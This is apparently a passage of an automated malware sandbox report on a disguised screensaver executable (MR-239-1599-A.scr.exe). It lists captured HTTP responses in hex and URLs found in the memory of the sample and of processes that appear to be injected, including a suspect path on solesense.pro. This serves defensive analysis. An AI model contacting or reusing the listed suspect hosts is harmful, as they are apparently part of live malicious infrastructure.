35 2f e2 cf 70 36 ba 97 96 58 59 f1 68 ee cd c6 b7 86 82 7f 1e 67 55 6b 95 6a 6d cc 9f 8f b5 e9 b6 58 fc 09 f3 89 95 13 ce d2 c7 3b 3b bb dd c7 77 93 20 75 82 ee 37 b5 47 10 e3 49 ea a4 5d 79 1b 0e 77 be 09 be fb
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 08 May 2024 16:23:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=ap19f1kakkqqdq1kfms236rbot; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheData Raw: 61 31 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 69 74 22 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 32 64 2f 32 64 69 2f 32 64 69 76 33 68 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 61 6e 79 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 30 37 2f 30 37 66 2f 30 37 66 7a 71 38 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                  Source: MR-239-1599-A.scr.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: MR-239-1599-A.scr.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: replace.exe, 00000006.00000002.4094316967.0000000004C16000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003A66000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
                  Source: replace.exe, 00000006.00000002.4094316967.0000000004C16000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003A66000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
                  Source: MR-239-1599-A.scr.exeString found in binary or memory: http://ocsp.comodoca.com0
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653700434.0000000005710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4094770900.0000000004D16000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.solesense.pro
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4094770900.0000000004D16000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.solesense.pro/aleu/
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://arsys.es/css/parking2.css
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/default.css
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/footer.html
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/header.html
                  Source: firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/icon.png
                  Source: firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/thumbnail.png
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.js
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/0u/0ua/0ua55l.js?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/1a/1an/1anfpg.css?ph=cb3a78e957
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e957
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://events.webnode.com/projects/-/events/
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://klientams.iv.lt/
                  Source: replace.exe, 00000006.00000002.4091676054.0000000002C9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: replace.exe, 00000006.00000002.4091676054.0000000002C9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                  Source: replace.exe, 00000006.00000002.4091676054.0000000002C9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: replace.exe, 00000006.00000002.4091676054.0000000002C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033O
                  Source: replace.exe, 00000006.00000002.4091676054.0000000002C72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                  Source: replace.exe, 00000006.00000003.2153903336.0000000007F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backup
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendas
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominio
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resell
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=ssl
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominios
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seo
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sms
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=re
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordp
